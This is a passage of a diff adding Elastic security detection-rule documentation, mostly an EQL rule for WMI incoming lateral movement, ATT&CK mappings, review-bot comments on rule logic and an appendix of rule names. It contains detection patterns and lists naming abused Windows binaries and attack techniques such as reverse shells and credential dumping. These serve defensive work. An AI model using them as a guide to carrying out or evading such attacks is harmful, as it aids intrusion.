"REGSVR32.EXE", + "MSBuild.exe", + "InstallUtil.exe", + "RegAsm.exe", + "RegSvcs.exe", + "msxsl.exe", + "CONTROL.EXE", + "EXPLORER.EXE", + "Microsoft.Workflow.Compiler.exe", + "msiexec.exe" + ) or + process.executable : ("C:\\Users\\*.exe", "C:\\ProgramData\\*.exe") + ) + ] + 
+---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Initial Access +** ID: TA0001 +** Reference URL: https://attack.mitre.org/tactics/TA0001/ +* Technique: +** Name: Phishing +** ID: T1566 +** Reference URL: https://attack.mitre.org/techniques/T1566/ +* Sub-technique: +** Name: Spearphishing Attachment +** ID: T1566.001 +** Reference URL: https://attack.mitre.org/techniques/T1566/001/ +* Tactic: +** Name: Execution +** ID: TA0002 +** Reference URL: https://attack.mitre.org/tactics/TA0002/ +* Technique: +** Name: Command and Scripting Interpreter +** ID: T1059 +** Reference URL: https://attack.mitre.org/techniques/T1059/ +* Sub-technique: +** Name: Visual Basic +** ID: T1059.005 +** Reference URL: https://attack.mitre.org/techniques/T1059/005/ +* Technique: +** Name: Windows Management Instrumentation +** ID: T1047 +** Reference URL: https://attack.mitre.org/techniques/T1047/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-wmi-incoming-lateral-movement.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-wmi-incoming-lateral-movement.asciidoc new file mode 100644 index 0000000000..97582c6b5c --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-wmi-incoming-lateral-movement.asciidoc 
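Review bot: `user.domain != "NT AUTHORITY"` in the second step of the Windows Script Interpreter Executing Process via WMI sequence is a case-sensitive string comparison (`!=` in EQL, unlike `:`), so its result depends on how each data source renders the domain name; the WMI Incoming Lateral Movement rule in this patch handles the same concern with `not user.id : ("S-1-5-18", "S-1-5-19", "S-1-5-20")`, which does not. Suggest the SID-based exclusion here for consistency. Missing documentation: this rule ships with no investigation guide (and no `Resources: Investigation Guide` tag) despite being a medium-severity two-stage sequence; at minimum, the fact that the two events are joined only on `host.id` within `maxspan = 5s`, not on the script process itself, belongs in a guide so analysts know to look for the `wscript.exe`/`cscript.exe` instance separately from the `wmiprvse.exe` child.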
@@ -0,0 +1,89 @@ +[[prebuilt-rule-8-10-5-wmi-incoming-lateral-movement]] +=== WMI Incoming Lateral Movement + +Identifies processes executed via Windows Management Instrumentation (WMI) on a remote host. This could be indicative of adversary lateral movement, but could be noisy if administrators use WMI to remotely manage hosts. + +*Rule type*: eql + +*Rule indices*: + +* logs-endpoint.events.* +* winlogbeat-* +* logs-windows.* + +*Severity*: medium + +*Risk score*: 47 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <<rule-schedule, `Additional look-back time`>>) + +*Maximum alerts per execution*: 100 + +*References*: None + +*Tags*: + +* Domain: Endpoint +* OS: Windows +* Use Case: Threat Detection +* Tactic: Lateral Movement +* Data Source: Elastic Defend + +*Version*: 108 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Rule query + + +[source, js] +---------------------------------- +sequence by host.id with maxspan = 2s + + /* Accepted Incoming RPC connection by Winmgmt service */ + + [network where host.os.type == "windows" and process.name : "svchost.exe" and network.direction : ("incoming", "ingress") and + source.ip != "127.0.0.1" and source.ip != "::1" and source.port >= 49152 and destination.port >= 49152 + ] + + /* Excluding Common FPs Nessus and SCCM */ + + [process where host.os.type == "windows" and event.type == "start" and process.parent.name : "WmiPrvSE.exe" and + not process.Ext.token.integrity_level_name : "system" and not user.id : ("S-1-5-18", "S-1-5-19", "S-1-5-20") and + not process.executable : + ("?:\\Program Files\\HPWBEM\\Tools\\hpsum_swdiscovery.exe", + "?:\\Windows\\CCM\\Ccm32BitLauncher.exe", + "?:\\Windows\\System32\\wbem\\mofcomp.exe", + "?:\\Windows\\Microsoft.NET\\Framework*\\csc.exe", + "?:\\Windows\\System32\\powercfg.exe") and + not (process.executable : "?:\\Windows\\System32\\msiexec.exe" and process.args : 
"REBOOT=ReallySuppress") and + not (process.executable : "?:\\Windows\\System32\\inetsrv\\appcmd.exe" and process.args : "uninstall") + ] + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Lateral Movement +** ID: TA0008 +** Reference URL: https://attack.mitre.org/tactics/TA0008/ +* Technique: +** Name: Remote Services +** ID: T1021 +** Reference URL: https://attack.mitre.org/techniques/T1021/ +* Tactic: +** Name: Execution +** ID: TA0002 +** Reference URL: https://attack.mitre.org/tactics/TA0002/ +* Technique: +** Name: Windows Management Instrumentation +** ID: T1047 +** Reference URL: https://attack.mitre.org/techniques/T1047/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rules-8-10-5-appendix.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rules-8-10-5-appendix.asciidoc new file mode 100644 index 0000000000..07a0d14082 --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rules-8-10-5-appendix.asciidoc 
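Review bot: The second step of the WMI Incoming Lateral Movement sequence filters on `process.Ext.token.integrity_level_name`, a field that only the Elastic Defend integration populates (the tags list `Data Source: Elastic Defend` alone), yet `winlogbeat-*` and `logs-windows.*` are in the rule indices; events from those sources carry no such field, so either drop them from the index list or document how that clause evaluates for them. The comment `/* Excluding Common FPs Nessus and SCCM */` names Nessus, but none of the listed executables is a Nessus component (the paths cover HP WBEM, CCM, mofcomp, csc, powercfg, msiexec and appcmd); either add the intended exclusion or reword the comment so it matches the list. This rule also lacks an investigation guide, which the description's own warning that it "could be noisy" argues for.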
@@ -0,0 +1,313 @@ +["appendix",role="exclude",id="prebuilt-rule-8-10-5-prebuilt-rules-8-10-5-appendix"] += Downloadable rule update v8.10.5 + +This section lists all updates associated with version 8.10.5 of the Fleet integration *Prebuilt Security Detection Rules*. + + +include::prebuilt-rule-8-10-5-potential-data-exfiltration-activity-to-an-unusual-iso-code.asciidoc[] +include::prebuilt-rule-8-10-5-potential-data-exfiltration-activity-to-an-unusual-ip-address.asciidoc[] +include::prebuilt-rule-8-10-5-potential-data-exfiltration-activity-to-an-unusual-destination-port.asciidoc[] +include::prebuilt-rule-8-10-5-potential-data-exfiltration-activity-to-an-unusual-region.asciidoc[] +include::prebuilt-rule-8-10-5-spike-in-bytes-sent-to-an-external-device.asciidoc[] +include::prebuilt-rule-8-10-5-spike-in-bytes-sent-to-an-external-device-via-airdrop.asciidoc[] +include::prebuilt-rule-8-10-5-unusual-process-writing-data-to-an-external-device.asciidoc[] +include::prebuilt-rule-8-10-5-machine-learning-detected-dga-activity-using-a-known-sunburst-dns-domain.asciidoc[] +include::prebuilt-rule-8-10-5-potential-dga-activity.asciidoc[] +include::prebuilt-rule-8-10-5-machine-learning-detected-a-dns-request-with-a-high-dga-probability-score.asciidoc[] +include::prebuilt-rule-8-10-5-machine-learning-detected-a-dns-request-predicted-to-be-a-dga-domain.asciidoc[] +include::prebuilt-rule-8-10-5-unusual-process-spawned-by-a-host.asciidoc[] +include::prebuilt-rule-8-10-5-unusual-process-spawned-by-a-parent-process.asciidoc[] +include::prebuilt-rule-8-10-5-unusual-process-spawned-by-a-user.asciidoc[] +include::prebuilt-rule-8-10-5-machine-learning-detected-a-suspicious-windows-event-predicted-to-be-malicious-activity.asciidoc[] +include::prebuilt-rule-8-10-5-machine-learning-detected-a-suspicious-windows-event-with-a-high-malicious-probability-score.asciidoc[] +include::prebuilt-rule-8-10-5-suspicious-windows-process-cluster-spawned-by-a-host.asciidoc[] 
+include::prebuilt-rule-8-10-5-suspicious-windows-process-cluster-spawned-by-a-parent-process.asciidoc[] +include::prebuilt-rule-8-10-5-suspicious-windows-process-cluster-spawned-by-a-user.asciidoc[] +include::prebuilt-rule-8-10-5-potential-network-scan-executed-from-host.asciidoc[] +include::prebuilt-rule-8-10-5-potential-upgrade-of-non-interactive-shell.asciidoc[] +include::prebuilt-rule-8-10-5-netcat-listener-established-via-rlwrap.asciidoc[] +include::prebuilt-rule-8-10-5-potential-linux-hack-tool-launched.asciidoc[] +include::prebuilt-rule-8-10-5-potential-ssh-it-ssh-worm-downloaded.asciidoc[] +include::prebuilt-rule-8-10-5-setcap-setuid-setgid-capability-set.asciidoc[] +include::prebuilt-rule-8-10-5-potential-privilege-escalation-via-python-cap-setuid.asciidoc[] +include::prebuilt-rule-8-10-5-potential-masquerading-as-communication-apps.asciidoc[] +include::prebuilt-rule-8-10-5-expired-or-revoked-driver-loaded.asciidoc[] +include::prebuilt-rule-8-10-5-potential-non-standard-port-ssh-connection.asciidoc[] +include::prebuilt-rule-8-10-5-security-software-discovery-via-grep.asciidoc[] +include::prebuilt-rule-8-10-5-potential-reverse-shell-activity-via-terminal.asciidoc[] +include::prebuilt-rule-8-10-5-suspicious-java-child-process.asciidoc[] +include::prebuilt-rule-8-10-5-hosts-file-modified.asciidoc[] +include::prebuilt-rule-8-10-5-modification-of-standard-authentication-module-or-configuration.asciidoc[] +include::prebuilt-rule-8-10-5-bash-shell-profile-modification.asciidoc[] +include::prebuilt-rule-8-10-5-ssh-authorized-keys-file-modification.asciidoc[] +include::prebuilt-rule-8-10-5-sudoers-file-modification.asciidoc[] +include::prebuilt-rule-8-10-5-network-activity-detected-via-cat.asciidoc[] +include::prebuilt-rule-8-10-5-potential-protocol-tunneling-via-chisel-client.asciidoc[] +include::prebuilt-rule-8-10-5-potential-protocol-tunneling-via-chisel-server.asciidoc[] +include::prebuilt-rule-8-10-5-suspicious-utility-launched-via-proxychains.asciidoc[] 
+include::prebuilt-rule-8-10-5-potential-linux-tunneling-and-or-port-forwarding.asciidoc[] +include::prebuilt-rule-8-10-5-suspicious-network-activity-to-the-internet-by-previously-unknown-executable.asciidoc[] +include::prebuilt-rule-8-10-5-potential-protocol-tunneling-via-earthworm.asciidoc[] +include::prebuilt-rule-8-10-5-sensitive-files-compression.asciidoc[] +include::prebuilt-rule-8-10-5-potential-linux-credential-dumping-via-unshadow.asciidoc[] +include::prebuilt-rule-8-10-5-linux-init-pid-1-secret-dump-via-gdb.asciidoc[] +include::prebuilt-rule-8-10-5-potential-linux-local-account-brute-force-detected.asciidoc[] +include::prebuilt-rule-8-10-5-potential-external-linux-ssh-brute-force-detected.asciidoc[] +include::prebuilt-rule-8-10-5-potential-internal-linux-ssh-brute-force-detected.asciidoc[] +include::prebuilt-rule-8-10-5-potential-successful-linux-ftp-brute-force-attack-detected.asciidoc[] +include::prebuilt-rule-8-10-5-potential-successful-linux-rdp-brute-force-attack-detected.asciidoc[] +include::prebuilt-rule-8-10-5-potential-successful-ssh-brute-force-attack.asciidoc[] +include::prebuilt-rule-8-10-5-potential-linux-credential-dumping-via-proc-filesystem.asciidoc[] +include::prebuilt-rule-8-10-5-potential-openssh-backdoor-logging-activity.asciidoc[] +include::prebuilt-rule-8-10-5-attempt-to-disable-iptables-or-firewall.asciidoc[] +include::prebuilt-rule-8-10-5-attempt-to-disable-syslog-service.asciidoc[] +include::prebuilt-rule-8-10-5-base16-or-base32-encoding-decoding-activity.asciidoc[] +include::prebuilt-rule-8-10-5-system-binary-copied-and-or-moved-to-suspicious-directory.asciidoc[] +include::prebuilt-rule-8-10-5-file-made-immutable-by-chattr.asciidoc[] +include::prebuilt-rule-8-10-5-potential-disabling-of-apparmor.asciidoc[] +include::prebuilt-rule-8-10-5-potential-disabling-of-selinux.asciidoc[] +include::prebuilt-rule-8-10-5-esxi-timestomping-using-touch-command.asciidoc[] +include::prebuilt-rule-8-10-5-file-deletion-via-shred.asciidoc[] 
+include::prebuilt-rule-8-10-5-file-permission-modification-in-writable-directory.asciidoc[] +include::prebuilt-rule-8-10-5-creation-of-hidden-files-and-directories-via-commandline.asciidoc[] +include::prebuilt-rule-8-10-5-creation-of-hidden-shared-object-file.asciidoc[] +include::prebuilt-rule-8-10-5-kernel-module-removal.asciidoc[] +include::prebuilt-rule-8-10-5-system-log-file-deletion.asciidoc[] +include::prebuilt-rule-8-10-5-potential-hidden-process-via-mount-hidepid.asciidoc[] +include::prebuilt-rule-8-10-5-potential-defense-evasion-via-proot.asciidoc[] +include::prebuilt-rule-8-10-5-suspicious-renaming-of-esxi-files.asciidoc[] +include::prebuilt-rule-8-10-5-suspicious-renaming-of-esxi-index-html-file.asciidoc[] +include::prebuilt-rule-8-10-5-esxi-discovery-via-find.asciidoc[] +include::prebuilt-rule-8-10-5-esxi-discovery-via-grep.asciidoc[] +include::prebuilt-rule-8-10-5-enumeration-of-kernel-modules.asciidoc[] +include::prebuilt-rule-8-10-5-hping-process-activity.asciidoc[] +include::prebuilt-rule-8-10-5-nping-process-activity.asciidoc[] +include::prebuilt-rule-8-10-5-potential-pspy-process-monitoring-detected.asciidoc[] +include::prebuilt-rule-8-10-5-sudo-command-enumeration-detected.asciidoc[] +include::prebuilt-rule-8-10-5-suid-sguid-enumeration-detected.asciidoc[] +include::prebuilt-rule-8-10-5-unusual-user-privilege-enumeration-via-id.asciidoc[] +include::prebuilt-rule-8-10-5-virtual-machine-fingerprinting.asciidoc[] +include::prebuilt-rule-8-10-5-abnormal-process-id-or-lock-file-created.asciidoc[] +include::prebuilt-rule-8-10-5-potential-curl-cve-2023-38545-exploitation.asciidoc[] +include::prebuilt-rule-8-10-5-file-creation-execution-and-self-deletion-in-suspicious-directory.asciidoc[] +include::prebuilt-rule-8-10-5-file-transfer-or-listener-established-via-netcat.asciidoc[] +include::prebuilt-rule-8-10-5-network-connection-via-recently-compiled-executable.asciidoc[] +include::prebuilt-rule-8-10-5-interactive-terminal-spawned-via-perl.asciidoc[] 
+include::prebuilt-rule-8-10-5-process-started-from-process-id-pid-file.asciidoc[] +include::prebuilt-rule-8-10-5-binary-executed-from-shared-memory-directory.asciidoc[] +include::prebuilt-rule-8-10-5-interactive-terminal-spawned-via-python.asciidoc[] +include::prebuilt-rule-8-10-5-potential-code-execution-via-postgresql.asciidoc[] +include::prebuilt-rule-8-10-5-linux-restricted-shell-breakout-via-linux-binary-s.asciidoc[] +include::prebuilt-rule-8-10-5-deprecated-potential-reverse-shell-via-suspicious-parent-process.asciidoc[] +include::prebuilt-rule-8-10-5-potential-reverse-shell-via-background-process.asciidoc[] +include::prebuilt-rule-8-10-5-potential-reverse-shell-via-java.asciidoc[] +include::prebuilt-rule-8-10-5-potential-reverse-shell-via-suspicious-child-process.asciidoc[] +include::prebuilt-rule-8-10-5-potential-meterpreter-reverse-shell.asciidoc[] +include::prebuilt-rule-8-10-5-potential-reverse-shell-via-suspicious-binary.asciidoc[] +include::prebuilt-rule-8-10-5-potential-reverse-shell.asciidoc[] +include::prebuilt-rule-8-10-5-potential-reverse-shell-via-udp.asciidoc[] +include::prebuilt-rule-8-10-5-suspicious-content-extracted-or-decompressed-via-funzip.asciidoc[] +include::prebuilt-rule-8-10-5-suspicious-system-commands-executed-by-previously-unknown-executable.asciidoc[] +include::prebuilt-rule-8-10-5-suspicious-mining-process-creation-event.asciidoc[] +include::prebuilt-rule-8-10-5-bpf-filter-applied-using-tc.asciidoc[] +include::prebuilt-rule-8-10-5-suspicious-data-encryption-via-openssl-utility.asciidoc[] +include::prebuilt-rule-8-10-5-suspicious-termination-of-esxi-process.asciidoc[] +include::prebuilt-rule-8-10-5-suspicious-file-changes-activity-detected.asciidoc[] +include::prebuilt-rule-8-10-5-potential-linux-ransomware-note-creation-detected.asciidoc[] +include::prebuilt-rule-8-10-5-high-number-of-process-terminations.asciidoc[] +include::prebuilt-rule-8-10-5-connection-to-external-network-via-telnet.asciidoc[] 
+include::prebuilt-rule-8-10-5-connection-to-internal-network-via-telnet.asciidoc[] +include::prebuilt-rule-8-10-5-chkconfig-service-add.asciidoc[] +include::prebuilt-rule-8-10-5-modification-of-openssh-binaries.asciidoc[] +include::prebuilt-rule-8-10-5-cron-job-created-or-changed-by-previously-unknown-process.asciidoc[] +include::prebuilt-rule-8-10-5-dynamic-linker-copy.asciidoc[] +include::prebuilt-rule-8-10-5-suspicious-file-creation-in-etc-for-persistence.asciidoc[] +include::prebuilt-rule-8-10-5-potential-persistence-through-init-d-detected.asciidoc[] +include::prebuilt-rule-8-10-5-kernel-module-load-via-insmod.asciidoc[] +include::prebuilt-rule-8-10-5-persistence-via-kde-autostart-script-or-desktop-file-modification.asciidoc[] +include::prebuilt-rule-8-10-5-potential-linux-backdoor-user-account-creation.asciidoc[] +include::prebuilt-rule-8-10-5-potential-remote-code-execution-via-web-server.asciidoc[] +include::prebuilt-rule-8-10-5-linux-user-added-to-privileged-group.asciidoc[] +include::prebuilt-rule-8-10-5-potential-persistence-through-motd-file-creation-detected.asciidoc[] +include::prebuilt-rule-8-10-5-suspicious-process-spawned-from-motd-detected.asciidoc[] +include::prebuilt-rule-8-10-5-potential-persistence-through-run-control-detected.asciidoc[] +include::prebuilt-rule-8-10-5-shared-object-created-or-changed-by-previously-unknown-process.asciidoc[] +include::prebuilt-rule-8-10-5-new-systemd-timer-created.asciidoc[] +include::prebuilt-rule-8-10-5-new-systemd-service-created-by-previously-unknown-process.asciidoc[] +include::prebuilt-rule-8-10-5-potential-unauthorized-access-via-wildcard-injection-detected.asciidoc[] +include::prebuilt-rule-8-10-5-potential-privilege-escalation-via-container-misconfiguration.asciidoc[] +include::prebuilt-rule-8-10-5-modification-of-dynamic-linker-preload-shared-object.asciidoc[] +include::prebuilt-rule-8-10-5-suspicious-symbolic-link-created.asciidoc[] 
+include::prebuilt-rule-8-10-5-potential-privilege-escalation-via-uid-int-max-bug-detected.asciidoc[] +include::prebuilt-rule-8-10-5-kernel-load-or-unload-via-kexec-detected.asciidoc[] +include::prebuilt-rule-8-10-5-potential-privilege-escalation-via-cve-2023-4911.asciidoc[] +include::prebuilt-rule-8-10-5-potential-privilege-escalation-via-overlayfs.asciidoc[] +include::prebuilt-rule-8-10-5-potential-privilege-escalation-via-pkexec.asciidoc[] +include::prebuilt-rule-8-10-5-potential-shell-via-wildcard-injection-detected.asciidoc[] +include::prebuilt-rule-8-10-5-potential-suspicious-debugfs-root-device-access.asciidoc[] +include::prebuilt-rule-8-10-5-potential-shadow-file-read-via-command-line-utilities.asciidoc[] +include::prebuilt-rule-8-10-5-potential-sudo-privilege-escalation-via-cve-2019-14287.asciidoc[] +include::prebuilt-rule-8-10-5-potential-sudo-hijacking-detected.asciidoc[] +include::prebuilt-rule-8-10-5-potential-sudo-token-manipulation-via-process-injection.asciidoc[] +include::prebuilt-rule-8-10-5-potential-privilege-escalation-via-recently-compiled-executable.asciidoc[] +include::prebuilt-rule-8-10-5-namespace-manipulation-using-unshare.asciidoc[] +include::prebuilt-rule-8-10-5-potential-privilege-escalation-through-writable-docker-socket.asciidoc[] +include::prebuilt-rule-8-10-5-cobalt-strike-command-and-control-beacon.asciidoc[] +include::prebuilt-rule-8-10-5-possible-fin7-dga-command-and-control-behavior.asciidoc[] +include::prebuilt-rule-8-10-5-halfbaked-command-and-control-beacon.asciidoc[] +include::prebuilt-rule-8-10-5-potential-network-sweep-detected.asciidoc[] +include::prebuilt-rule-8-10-5-potential-network-scan-detected.asciidoc[] +include::prebuilt-rule-8-10-5-potential-syn-based-network-scan-detected.asciidoc[] +include::prebuilt-rule-8-10-5-inbound-connection-to-an-unsecure-elasticsearch-node.asciidoc[] +include::prebuilt-rule-8-10-5-exporting-exchange-mailbox-via-powershell.asciidoc[] 
+include::prebuilt-rule-8-10-5-exchange-mailbox-export-via-powershell.asciidoc[] +include::prebuilt-rule-8-10-5-powershell-suspicious-script-with-audio-capture-capabilities.asciidoc[] +include::prebuilt-rule-8-10-5-powershell-keylogging-script.asciidoc[] +include::prebuilt-rule-8-10-5-encrypting-files-with-winrar-or-7z.asciidoc[] +include::prebuilt-rule-8-10-5-potential-file-transfer-via-certreq.asciidoc[] +include::prebuilt-rule-8-10-5-connection-to-commonly-abused-web-services.asciidoc[] +include::prebuilt-rule-8-10-5-potential-dns-tunneling-via-nslookup.asciidoc[] +include::prebuilt-rule-8-10-5-port-forwarding-rule-addition.asciidoc[] +include::prebuilt-rule-8-10-5-potential-remote-desktop-tunneling-detected.asciidoc[] +include::prebuilt-rule-8-10-5-remote-file-download-via-script-interpreter.asciidoc[] +include::prebuilt-rule-8-10-5-potential-credential-access-via-windows-utilities.asciidoc[] +include::prebuilt-rule-8-10-5-ntds-or-sam-database-file-copied.asciidoc[] +include::prebuilt-rule-8-10-5-potential-credential-access-via-trusted-developer-utility.asciidoc[] +include::prebuilt-rule-8-10-5-firsttime-seen-account-performing-dcsync.asciidoc[] +include::prebuilt-rule-8-10-5-potential-credential-access-via-dcsync.asciidoc[] +include::prebuilt-rule-8-10-5-kerberos-pre-authentication-disabled-for-user.asciidoc[] +include::prebuilt-rule-8-10-5-access-to-a-sensitive-ldap-attribute.asciidoc[] +include::prebuilt-rule-8-10-5-lsass-process-access-via-windows-api.asciidoc[] +include::prebuilt-rule-8-10-5-potential-local-ntlm-relay-via-http.asciidoc[] +include::prebuilt-rule-8-10-5-sensitive-privilege-seenabledelegationprivilege-assigned-to-a-user.asciidoc[] +include::prebuilt-rule-8-10-5-potential-credential-access-via-renamed-com-services-dll.asciidoc[] +include::prebuilt-rule-8-10-5-potential-credential-access-via-lsass-memory-dump.asciidoc[] +include::prebuilt-rule-8-10-5-suspicious-remote-registry-access-via-sebackupprivilege.asciidoc[] 
+include::prebuilt-rule-8-10-5-symbolic-link-to-shadow-copy-created.asciidoc[] +include::prebuilt-rule-8-10-5-adding-hidden-file-attribute-via-attrib.asciidoc[] +include::prebuilt-rule-8-10-5-modification-of-amsienable-registry-key.asciidoc[] +include::prebuilt-rule-8-10-5-clearing-windows-console-history.asciidoc[] +include::prebuilt-rule-8-10-5-clearing-windows-event-logs.asciidoc[] +include::prebuilt-rule-8-10-5-code-signing-policy-modification-through-registry.asciidoc[] +include::prebuilt-rule-8-10-5-windows-defender-disabled-via-registry-modification.asciidoc[] +include::prebuilt-rule-8-10-5-powershell-script-block-logging-disabled.asciidoc[] +include::prebuilt-rule-8-10-5-disabling-windows-defender-security-settings-via-powershell.asciidoc[] +include::prebuilt-rule-8-10-5-disable-windows-event-and-security-logs-using-built-in-tools.asciidoc[] +include::prebuilt-rule-8-10-5-dns-over-https-enabled-via-registry.asciidoc[] +include::prebuilt-rule-8-10-5-suspicious-net-code-compilation.asciidoc[] +include::prebuilt-rule-8-10-5-microsoft-build-engine-started-by-a-script-process.asciidoc[] +include::prebuilt-rule-8-10-5-microsoft-build-engine-using-an-alternate-name.asciidoc[] +include::prebuilt-rule-8-10-5-microsoft-build-engine-started-an-unusual-process.asciidoc[] +include::prebuilt-rule-8-10-5-potential-dll-side-loading-via-trusted-microsoft-programs.asciidoc[] +include::prebuilt-rule-8-10-5-process-injection-by-the-microsoft-build-engine.asciidoc[] +include::prebuilt-rule-8-10-5-suspicious-endpoint-security-parent-process.asciidoc[] +include::prebuilt-rule-8-10-5-suspicious-werfault-child-process.asciidoc[] +include::prebuilt-rule-8-10-5-potential-windows-error-manager-masquerading.asciidoc[] +include::prebuilt-rule-8-10-5-microsoft-windows-defender-tampering.asciidoc[] +include::prebuilt-rule-8-10-5-network-connection-via-signed-binary.asciidoc[] +include::prebuilt-rule-8-10-5-unusual-network-activity-from-a-windows-system-binary.asciidoc[] 
+include::prebuilt-rule-8-10-5-parent-process-pid-spoofing.asciidoc[] +include::prebuilt-rule-8-10-5-local-account-tokenfilter-policy-disabled.asciidoc[] +include::prebuilt-rule-8-10-5-suspicious-net-reflection-via-powershell.asciidoc[] +include::prebuilt-rule-8-10-5-potential-process-injection-via-powershell.asciidoc[] +include::prebuilt-rule-8-10-5-windows-firewall-disabled-via-powershell.asciidoc[] +include::prebuilt-rule-8-10-5-process-termination-followed-by-deletion.asciidoc[] +include::prebuilt-rule-8-10-5-scheduled-tasks-at-command-enabled.asciidoc[] +include::prebuilt-rule-8-10-5-potential-secure-file-deletion-via-sdelete-utility.asciidoc[] +include::prebuilt-rule-8-10-5-solarwinds-process-disabling-services-via-registry.asciidoc[] +include::prebuilt-rule-8-10-5-suspicious-execution-from-a-mounted-device.asciidoc[] +include::prebuilt-rule-8-10-5-suspicious-managed-code-hosting-process.asciidoc[] +include::prebuilt-rule-8-10-5-suspicious-process-access-via-direct-system-call.asciidoc[] +include::prebuilt-rule-8-10-5-suspicious-script-object-execution.asciidoc[] +include::prebuilt-rule-8-10-5-suspicious-wmic-xsl-script-execution.asciidoc[] +include::prebuilt-rule-8-10-5-suspicious-zoom-child-process.asciidoc[] +include::prebuilt-rule-8-10-5-unusual-executable-file-creation-by-a-system-critical-process.asciidoc[] +include::prebuilt-rule-8-10-5-unsigned-dll-side-loading-from-a-suspicious-folder.asciidoc[] +include::prebuilt-rule-8-10-5-untrusted-driver-loaded.asciidoc[] +include::prebuilt-rule-8-10-5-adfind-command-activity.asciidoc[] +include::prebuilt-rule-8-10-5-account-discovery-command-via-system-account.asciidoc[] +include::prebuilt-rule-8-10-5-powershell-share-enumeration-script.asciidoc[] +include::prebuilt-rule-8-10-5-powershell-suspicious-discovery-related-windows-api-functions.asciidoc[] +include::prebuilt-rule-8-10-5-command-execution-via-solarwinds-process.asciidoc[] 
+include::prebuilt-rule-8-10-5-command-shell-activity-started-via-rundll32.asciidoc[] +include::prebuilt-rule-8-10-5-suspicious-portable-executable-encoded-in-powershell-script.asciidoc[] +include::prebuilt-rule-8-10-5-psexec-network-connection.asciidoc[] +include::prebuilt-rule-8-10-5-network-connection-via-registration-utility.asciidoc[] +include::prebuilt-rule-8-10-5-outbound-scheduled-task-activity-via-powershell.asciidoc[] +include::prebuilt-rule-8-10-5-suspicious-cmd-execution-via-wmi.asciidoc[] +include::prebuilt-rule-8-10-5-suspicious-pdf-reader-child-process.asciidoc[] +include::prebuilt-rule-8-10-5-suspicious-process-execution-via-renamed-psexec-executable.asciidoc[] +include::prebuilt-rule-8-10-5-conhost-spawned-by-suspicious-parent-process.asciidoc[] +include::prebuilt-rule-8-10-5-third-party-backup-files-deleted-via-unexpected-process.asciidoc[] +include::prebuilt-rule-8-10-5-deleting-backup-catalogs-with-wbadmin.asciidoc[] +include::prebuilt-rule-8-10-5-volume-shadow-copy-deletion-via-powershell.asciidoc[] +include::prebuilt-rule-8-10-5-volume-shadow-copy-deletion-via-wmic.asciidoc[] +include::prebuilt-rule-8-10-5-windows-script-executing-powershell.asciidoc[] +include::prebuilt-rule-8-10-5-windows-script-interpreter-executing-process-via-wmi.asciidoc[] +include::prebuilt-rule-8-10-5-microsoft-exchange-server-um-writing-suspicious-files.asciidoc[] +include::prebuilt-rule-8-10-5-microsoft-exchange-server-um-spawning-suspicious-processes.asciidoc[] +include::prebuilt-rule-8-10-5-microsoft-exchange-worker-spawning-suspicious-processes.asciidoc[] +include::prebuilt-rule-8-10-5-suspicious-ms-office-child-process.asciidoc[] +include::prebuilt-rule-8-10-5-suspicious-ms-outlook-child-process.asciidoc[] +include::prebuilt-rule-8-10-5-suspicious-explorer-child-process.asciidoc[] +include::prebuilt-rule-8-10-5-incoming-dcom-lateral-movement-with-mmc.asciidoc[] +include::prebuilt-rule-8-10-5-nullsessionpipe-registry-modification.asciidoc[] 
+include::prebuilt-rule-8-10-5-potential-remote-desktop-shadowing-activity.asciidoc[] +include::prebuilt-rule-8-10-5-potential-lateral-tool-transfer-via-smb-share.asciidoc[] +include::prebuilt-rule-8-10-5-execution-via-tsclient-mountpoint.asciidoc[] +include::prebuilt-rule-8-10-5-remote-execution-via-file-shares.asciidoc[] +include::prebuilt-rule-8-10-5-wmi-incoming-lateral-movement.asciidoc[] +include::prebuilt-rule-8-10-5-incoming-execution-via-powershell-remoting.asciidoc[] +include::prebuilt-rule-8-10-5-rdp-enabled-via-registry.asciidoc[] +include::prebuilt-rule-8-10-5-suspicious-rdp-activex-client-loaded.asciidoc[] +include::prebuilt-rule-8-10-5-unusual-child-process-of-dns-exe.asciidoc[] +include::prebuilt-rule-8-10-5-unusual-file-modification-by-dns-exe.asciidoc[] +include::prebuilt-rule-8-10-5-lateral-movement-via-startup-folder.asciidoc[] +include::prebuilt-rule-8-10-5-adminsdholder-backdoor.asciidoc[] +include::prebuilt-rule-8-10-5-adobe-hijack-persistence.asciidoc[] +include::prebuilt-rule-8-10-5-registry-persistence-via-appcert-dll.asciidoc[] +include::prebuilt-rule-8-10-5-registry-persistence-via-appinit-dll.asciidoc[] +include::prebuilt-rule-8-10-5-image-file-execution-options-injection.asciidoc[] +include::prebuilt-rule-8-10-5-suspicious-startup-shell-folder-modification.asciidoc[] +include::prebuilt-rule-8-10-5-scheduled-task-created-by-a-windows-script.asciidoc[] +include::prebuilt-rule-8-10-5-persistence-via-microsoft-office-addins.asciidoc[] +include::prebuilt-rule-8-10-5-new-activesyncalloweddeviceid-added-via-powershell.asciidoc[] +include::prebuilt-rule-8-10-5-persistence-via-powershell-profile.asciidoc[] +include::prebuilt-rule-8-10-5-account-password-reset-remotely.asciidoc[] +include::prebuilt-rule-8-10-5-adminsdholder-sdprop-exclusion-added.asciidoc[] +include::prebuilt-rule-8-10-5-unsigned-dll-loaded-by-svchost.asciidoc[] +include::prebuilt-rule-8-10-5-unusual-persistence-via-services-registry.asciidoc[] 
